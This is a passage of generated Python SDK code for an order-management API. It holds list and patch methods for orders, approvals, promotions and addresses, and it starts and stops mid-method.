    :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
    :return: ListOrder
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of every keyword argument this endpoint understands.
    all_params = ['direction', 'buyer_id', 'supplier_id', '_from', 'to', 'search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the call's locals so positional and keyword arguments can be
    # handled uniformly below. NOTE: locals() must be captured before any
    # other local is assigned.
    params = locals()
    # Reject unknown kwargs, then fold the accepted ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `list`")
    resource_path = '/orders/{direction}'.replace('{format}', 'json')
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    # Translate snake_case Python names onto the API's camelCase query keys;
    # only parameters that were actually supplied are sent.
    query_params = {}
    if 'buyer_id' in params:
        query_params['buyerID'] = params['buyer_id']
    if 'supplier_id' in params:
        query_params['supplierID'] = params['supplier_id']
    if '_from' in params:
        # `_from` avoids shadowing the Python keyword `from`.
        query_params['from'] = params['_from']
    if 'to' in params:
        query_params['to'] = params['to']
    if 'search' in params:
        query_params['search'] = params['search']
    if 'search_on' in params:
        query_params['searchOn'] = params['search_on']
    if 'sort_by' in params:
        query_params['sortBy'] = params['sort_by']
    if 'page' in params:
        query_params['page'] = params['page']
    if 'page_size' in params:
        query_params['pageSize'] = params['page_size']
    if 'filters' in params:
        query_params['filters'] = params['filters']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    # Response is deserialized into a ListOrder page by the api_client.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ListOrder',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def list_approvals(self, direction, order_id, **kwargs):
    """
    List the approvals recorded for an order.

    The request is synchronous by default. Supply a `callback` function
    kwarg to run it asynchronously; the request thread is then returned
    instead of the deserialized response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_approvals(direction, order_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param str search: Word or phrase to search for.
    :param str search_on: Comma-delimited list of fields to search on.
    :param str sort_by: Comma-delimited list of fields to sort by.
    :param int page: Page of results to return. Default: 1
    :param int page_size: Number of results to return per page. Default: 20, max: 100.
    :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
    :return: ListOrderApproval
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always unwraps the deserialized payload
    # rather than the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Delegation covers both modes: with a `callback` kwarg the underlying
    # call yields the request thread, otherwise the ListOrderApproval page.
    return self.list_approvals_with_http_info(direction, order_id, **kwargs)
def list_approvals_with_http_info(self, direction, order_id, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_approvals_with_http_info(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param str search: Word or phrase to search for.
    :param str search_on: Comma-delimited list of fields to search on.
    :param str sort_by: Comma-delimited list of fields to sort by.
    :param int page: Page of results to return. Default: 1
    :param int page_size: Number of results to return per page. Default: 20, max: 100.
    :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
    :return: ListOrderApproval
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of every keyword argument this endpoint understands.
    all_params = ['direction', 'order_id', 'search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the call's locals so positional and keyword arguments can be
    # handled uniformly below. NOTE: locals() must be captured before any
    # other local is assigned.
    params = locals()
    # Reject unknown kwargs, then fold the accepted ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_approvals" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `list_approvals`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `list_approvals`")
    resource_path = '/orders/{direction}/{orderID}/approvals'.replace('{format}', 'json')
    # Map snake_case Python names onto the camelCase path placeholders.
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    # Only list options that were actually supplied go in the query string.
    query_params = {}
    if 'search' in params:
        query_params['search'] = params['search']
    if 'search_on' in params:
        query_params['searchOn'] = params['search_on']
    if 'sort_by' in params:
        query_params['sortBy'] = params['sort_by']
    if 'page' in params:
        query_params['page'] = params['page']
    if 'page_size' in params:
        query_params['pageSize'] = params['page_size']
    if 'filters' in params:
        query_params['filters'] = params['filters']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    # Response is deserialized into a ListOrderApproval page by the api_client.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ListOrderApproval',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def list_eligible_approvers(self, direction, order_id, **kwargs):
    """
    List the users eligible to approve an order.

    The request is synchronous by default. Supply a `callback` function
    kwarg to run it asynchronously; the request thread is then returned
    instead of the deserialized response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_eligible_approvers(direction, order_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param str search: Word or phrase to search for.
    :param str search_on: Comma-delimited list of fields to search on.
    :param str sort_by: Comma-delimited list of fields to sort by.
    :param int page: Page of results to return. Default: 1
    :param int page_size: Number of results to return per page. Default: 20, max: 100.
    :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
    :return: ListUser
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always unwraps the deserialized payload
    # rather than the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Delegation covers both modes: with a `callback` kwarg the underlying
    # call yields the request thread, otherwise the ListUser page.
    return self.list_eligible_approvers_with_http_info(direction, order_id, **kwargs)
def list_eligible_approvers_with_http_info(self, direction, order_id, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_eligible_approvers_with_http_info(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param str search: Word or phrase to search for.
    :param str search_on: Comma-delimited list of fields to search on.
    :param str sort_by: Comma-delimited list of fields to sort by.
    :param int page: Page of results to return. Default: 1
    :param int page_size: Number of results to return per page. Default: 20, max: 100.
    :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
    :return: ListUser
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of every keyword argument this endpoint understands.
    all_params = ['direction', 'order_id', 'search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the call's locals so positional and keyword arguments can be
    # handled uniformly below. NOTE: locals() must be captured before any
    # other local is assigned.
    params = locals()
    # Reject unknown kwargs, then fold the accepted ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_eligible_approvers" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `list_eligible_approvers`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `list_eligible_approvers`")
    resource_path = '/orders/{direction}/{orderID}/eligibleapprovers'.replace('{format}', 'json')
    # Map snake_case Python names onto the camelCase path placeholders.
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    # Only list options that were actually supplied go in the query string.
    query_params = {}
    if 'search' in params:
        query_params['search'] = params['search']
    if 'search_on' in params:
        query_params['searchOn'] = params['search_on']
    if 'sort_by' in params:
        query_params['sortBy'] = params['sort_by']
    if 'page' in params:
        query_params['page'] = params['page']
    if 'page_size' in params:
        query_params['pageSize'] = params['page_size']
    if 'filters' in params:
        query_params['filters'] = params['filters']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    # Response is deserialized into a ListUser page by the api_client.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ListUser',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def list_promotions(self, direction, order_id, **kwargs):
    """
    List the promotions applied to an order.

    The request is synchronous by default. Supply a `callback` function
    kwarg to run it asynchronously; the request thread is then returned
    instead of the deserialized response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_promotions(direction, order_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param str search: Word or phrase to search for.
    :param str search_on: Comma-delimited list of fields to search on.
    :param str sort_by: Comma-delimited list of fields to sort by.
    :param int page: Page of results to return. Default: 1
    :param int page_size: Number of results to return per page. Default: 20, max: 100.
    :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
    :return: ListOrderPromotion
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always unwraps the deserialized payload
    # rather than the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Delegation covers both modes: with a `callback` kwarg the underlying
    # call yields the request thread, otherwise the ListOrderPromotion page.
    return self.list_promotions_with_http_info(direction, order_id, **kwargs)
def list_promotions_with_http_info(self, direction, order_id, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_promotions_with_http_info(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param str search: Word or phrase to search for.
    :param str search_on: Comma-delimited list of fields to search on.
    :param str sort_by: Comma-delimited list of fields to sort by.
    :param int page: Page of results to return. Default: 1
    :param int page_size: Number of results to return per page. Default: 20, max: 100.
    :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
    :return: ListOrderPromotion
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of every keyword argument this endpoint understands.
    all_params = ['direction', 'order_id', 'search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the call's locals so positional and keyword arguments can be
    # handled uniformly below. NOTE: locals() must be captured before any
    # other local is assigned.
    params = locals()
    # Reject unknown kwargs, then fold the accepted ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_promotions" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `list_promotions`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `list_promotions`")
    resource_path = '/orders/{direction}/{orderID}/promotions'.replace('{format}', 'json')
    # Map snake_case Python names onto the camelCase path placeholders.
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    # Only list options that were actually supplied go in the query string.
    query_params = {}
    if 'search' in params:
        query_params['search'] = params['search']
    if 'search_on' in params:
        query_params['searchOn'] = params['search_on']
    if 'sort_by' in params:
        query_params['sortBy'] = params['sort_by']
    if 'page' in params:
        query_params['page'] = params['page']
    if 'page_size' in params:
        query_params['pageSize'] = params['page_size']
    if 'filters' in params:
        query_params['filters'] = params['filters']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    # Response is deserialized into a ListOrderPromotion page by the api_client.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ListOrderPromotion',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def patch(self, direction, order_id, partial_order, **kwargs):
    """
    Partially update an order.

    The request is synchronous by default. Supply a `callback` function
    kwarg to run it asynchronously; the request thread is then returned
    instead of the deserialized response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.patch(direction, order_id, partial_order, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param Order partial_order: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always unwraps the deserialized payload
    # rather than the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Delegation covers both modes: with a `callback` kwarg the underlying
    # call yields the request thread, otherwise the updated Order.
    return self.patch_with_http_info(direction, order_id, partial_order, **kwargs)
def patch_with_http_info(self, direction, order_id, partial_order, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.patch_with_http_info(direction, order_id, partial_order, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param Order partial_order: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of every keyword argument this endpoint understands.
    all_params = ['direction', 'order_id', 'partial_order']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the call's locals so positional and keyword arguments can be
    # handled uniformly below. NOTE: locals() must be captured before any
    # other local is assigned.
    params = locals()
    # Reject unknown kwargs, then fold the accepted ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method patch" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `patch`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `patch`")
    # verify the required parameter 'partial_order' is set
    if ('partial_order' not in params) or (params['partial_order'] is None):
        raise ValueError("Missing the required parameter `partial_order` when calling `patch`")
    resource_path = '/orders/{direction}/{orderID}'.replace('{format}', 'json')
    # Map snake_case Python names onto the camelCase path placeholders.
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # The partial Order model is serialized as the PATCH request body.
    if 'partial_order' in params:
        body_params = params['partial_order']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    # Response is deserialized into the updated Order by the api_client.
    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Order',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def patch_billing_address(self, direction, order_id, partial_address, **kwargs):
    """
    Partially update an order's billing address.

    The request is synchronous by default. Supply a `callback` function
    kwarg to run it asynchronously; the request thread is then returned
    instead of the deserialized response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.patch_billing_address(direction, order_id, partial_address, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param Address partial_address: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always unwraps the deserialized payload
    # rather than the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Delegation covers both modes: with a `callback` kwarg the underlying
    # call yields the request thread, otherwise the updated Order.
    return self.patch_billing_address_with_http_info(direction, order_id, partial_address, **kwargs)
def patch_billing_address_with_http_info(self, direction, order_id, partial_address, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.patch_billing_address_with_http_info(direction, order_id, partial_address, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param Address partial_address: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of every keyword argument this endpoint understands.
    all_params = ['direction', 'order_id', 'partial_address']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the call's locals so positional and keyword arguments can be
    # handled uniformly below. NOTE: locals() must be captured before any
    # other local is assigned.
    params = locals()
    # Reject unknown kwargs, then fold the accepted ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method patch_billing_address" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `patch_billing_address`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `patch_billing_address`")
    # verify the required parameter 'partial_address' is set
    if ('partial_address' not in params) or (params['partial_address'] is None):
        raise ValueError("Missing the required parameter `partial_address` when calling `patch_billing_address`")
    resource_path = '/orders/{direction}/{orderID}/billto'.replace('{format}', 'json')
    # Map snake_case Python names onto the camelCase path placeholders.
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # The partial Address model is serialized as the PATCH request body.
    if 'partial_address' in params:
        body_params = params['partial_address']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    # Response is deserialized into the updated Order by the api_client.
    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Order',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def patch_from_user(self, direction, order_id, partial_user, **kwargs):
    """
    Partially update the user an order is from.

    The request is synchronous by default. Supply a `callback` function
    kwarg to run it asynchronously; the request thread is then returned
    instead of the deserialized response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.patch_from_user(direction, order_id, partial_user, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param User partial_user: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always unwraps the deserialized payload
    # rather than the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Delegation covers both modes: with a `callback` kwarg the underlying
    # call yields the request thread, otherwise the updated Order.
    return self.patch_from_user_with_http_info(direction, order_id, partial_user, **kwargs)
def patch_from_user_with_http_info(self, direction, order_id, partial_user, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_from_user_with_http_info(direction, order_id, partial_user, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param User partial_user: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'partial_user']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_from_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `patch_from_user`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `patch_from_user`")
# verify the required parameter 'partial_user' is set
if ('partial_user' not in params) or (params['partial_user'] is None):
raise ValueError("Missing the required parameter `partial_user` when calling `patch_from_user`")
resource_path = '/orders/{direction}/{orderID}/fromuser'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'partial_user' in params:
body_params = params['partial_user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def patch_shipping_address(self, direction, order_id, partial_address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_shipping_address(direction, order_id, partial_address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address partial_address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_shipping_address_with_http_info(direction, order_id, partial_address, **kwargs)
else:
(data) = self.patch_shipping_address_with_http_info(direction, order_id, partial_address, **kwargs)
return data
def patch_shipping_address_with_http_info(self, direction, order_id, partial_address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_shipping_address_with_http_info(direction, order_id, partial_address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address partial_address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'partial_address']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_shipping_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `patch_shipping_address`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `patch_shipping_address`")
# verify the required parameter 'partial_address' is set
if ('partial_address' not in params) or (params['partial_address'] is None):
raise ValueError("Missing the required parameter `partial_address` when calling `patch_shipping_address`")
resource_path = '/orders/{direction}/{orderID}/shipto'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'partial_address' in params:
body_params = params['partial_address']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def remove_promotion(self, direction, order_id, promo_code, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_promotion(direction, order_id, promo_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str promo_code: Promo code of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.remove_promotion_with_http_info(direction, order_id, promo_code, **kwargs)
else:
(data) = self.remove_promotion_with_http_info(direction, order_id, promo_code, **kwargs)
return data
def remove_promotion_with_http_info(self, direction, order_id, promo_code, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_promotion_with_http_info(direction, order_id, promo_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
